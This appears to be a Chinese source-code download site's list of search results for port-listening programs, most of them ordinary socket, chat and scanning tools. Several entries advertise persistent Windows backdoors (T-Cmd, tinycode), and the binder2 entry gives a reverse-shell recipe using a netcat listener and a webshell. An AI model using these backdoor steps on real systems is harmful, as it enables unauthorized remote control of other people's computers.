搜索资源列表
端口监听.rar
- 用汇编编的端口监听,支持win98/win2000/xp 我的QQ:28911010
端口映射及TCP转发软件源代码
端口映射
PortTransfer_三种模式。
(1) PortTransfer Port Dest_IP Port
在运行本程序的计算机上监听Port端口,并将所有连接请求转到Dest_IP的Port去
(2) PortTransfer ctrlIP ctrlPort Dest_IP Port
和模式3配合用,程序将先主动连接ctrlIP:ctrlPort,
t_cmd
- T-Cmd v1.0是一个服务级的后门程序,适用平台 为Windows2000/XP。它可自动为远程/本地主机创建服务级后门,无须使用任何额外的命令, 支持本地/远程模式。重启后,程序仍然自动运行,监听端口20540/tcp。-T-Cmd v1.0 is a service-level backdoor procedure, the application platform for Windows2000/XP. It can
用Java实现Web服务器
- 用Java实现Web服务器 本文实现了GET请求的Web服务器程序的方法,通过创建ServerSocket类对象,监听端口8080; 等待、接受客户机连接到端口8080; 创建与socket字相关联的输入流和输出流 然后,读取客户机的请求信息,若请求类型是GET,则从请求信息中获取所访问的HTML文件名,如果HTML文件存在,则打开HTML文件,把HTTP头信息和HTML文件内容通过socket传回给Web浏览器,然后关闭文件。否则
同步套接字监听
- 使用同步套接字服务器的主机解析、主机绑定、端口监听、数据传输和数据接收等功能来实现电脑之间的通讯图的左边显示了...本文使用了一个线程来接收用户的网络通讯信息和监听端口的服务。-use synchronization socket server host parsing mainfr a me bundled, port monitoring, data transmission and data reception capabili
简易聊天程序
- 实现基本的聊天功能,只需输入IP,即可与对方聊天,服务器端和客户端集成在同一个文件中,并且以多线程方式监听端口。-achieve basic chat function keys IP, can chat with each other. servers and clients with an integrated document and, in a multithreaded manner monitor ports.
FileTrans
- 本程序是一个用C#编写的文件传输程序,分服务端和客户端。 服务端首先监听端口,等待客户端的连接请求,一旦连接成功,即把可供客户端下载的文件名称发给客户端,客户端接受到文件名称后,选择要下载的文件,并发给服务器。服务器根据客户端发送的文件名,选择指定的文件读取文件流,并把文件流内容赋值给网络流发送到客户端,客户端将接受到的网络流赋值给文件流,并保存到文件。 注意:在使用时,要在E盘下建立一个aa文件夹,将一些文件放入其中,以供演示。-th
JAVAsocketServer
- 这个socket服务器代码可以为你建立指定的监听端口、客户端请求响应机制等一些服务器所具备的基本框架-the socket server code can you establish designated monitor port, the client request response mechanism and some other servers with a basic fr a mework
tinycode
- 自动为远程/本地主机创建服务级后门,无须使用任何额外的命令,支持本地/远程模式。重启后,程序仍然自动运行。监听端口20540-automatically for remote/local host service level to create a back door without the use of any additional orders, support local/remote mode. After the restar
网络数据包监听程序
- VC++编写的类似Sniffer的网络数据包监听程序,另外还包括一个扫描程序,包括如端口扫描,共享扫描,SQL扫描,信箱探测,等等。-A program listening network packet using Visual C++,it is fimiliar witha program listening network packet using Sniffer
TCP.UDP协议的实时监听
- 这是一个用dephi编写的用于监视tcp/udp端口的程序,能够实时监测各个端口的情况-dephi used for the preparation of the surveillance tcp/udp port procedures to real-time monitoring of various ports
本机端口扫描
- 可实现本机的端口扫描功能,对于监听网络程序有所帮助。-machine can achieve the port-scanning capabilities, network monitoring procedures for some help.
同步套接字监听
- 使用同步套接字服务器的主机解析、主机绑定、端口监听、数据传输和数据接收等功能来实现电脑之间的通讯图的左边显示了...本文使用了一个线程来接收用户的网络通讯信息和监听端口的服务。-use synchronization socket server host parsing mainfr a me bundled, port monitoring, data transmission and data reception capabili
同步套接字服务器端
- 使用同步套接字服务器的主机解析、主机绑定、端口监听、数据传输和数据接收等功能来实现电脑之间的通讯图的左边显示了-use synchronization socket server host parsing mainfr a me bundled, port monitoring, data transmission and reception functions to achieve communication between the
binder2
- 简介: 在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用. 用法: 1. 在本地机器监听一个端口: netcat -vv -l -p 80 2. 通过webShell或是别的什么运行后门: binder2 80 youIPadd 3. 本地监听端口将截获一个来自远程主机的cmd.
socketcode
- 这个socket服务器代码可以为你建立指定的监听端口、客户端请求响应机制等一些服务器所具备的基本框架 -the socket server code can you establish designated monitor ports, client requests for response mechanism and some other servers with a basic fr a mework
webrom
- 监听端口坎坎坷坷??可 阔阔卡坎坎坷坷卡-monitor port Bumpy Road Bumpy Road Ke Ke cards wide width Kakan bumpy uneven card
CS_RemoteControl
- server remote control所需模块如下: 网络模块:负责监听客户端连接,接受处理发来的命令(鼠标,键盘,网络消息等),在本级处理这些消息并发送各种数据(屏幕数据,命令反馈数据)到客户端监听程序 编码模块:负责对屏幕图像数据进行压缩编码。具体的编码方法有客户端决定。压缩选项包括霍夫曼压缩,多遍霍夫曼压缩,RunLength编码,RunLength-霍夫曼组合编码及不压缩 主框架模块:负责处理s
Sock2File
- 一个socket服务端监听接收得程序,可指定监听端口。连接后将数据保存为一个文本文件.-A socket server to receive a monitoring program, to designate the port monitor. Data connection will be saved as a text file.
GetOpenPorT
- 列表显示当前已打开的TCP/UDP监听端口-Displays the current list of open TCP/UDP listening ports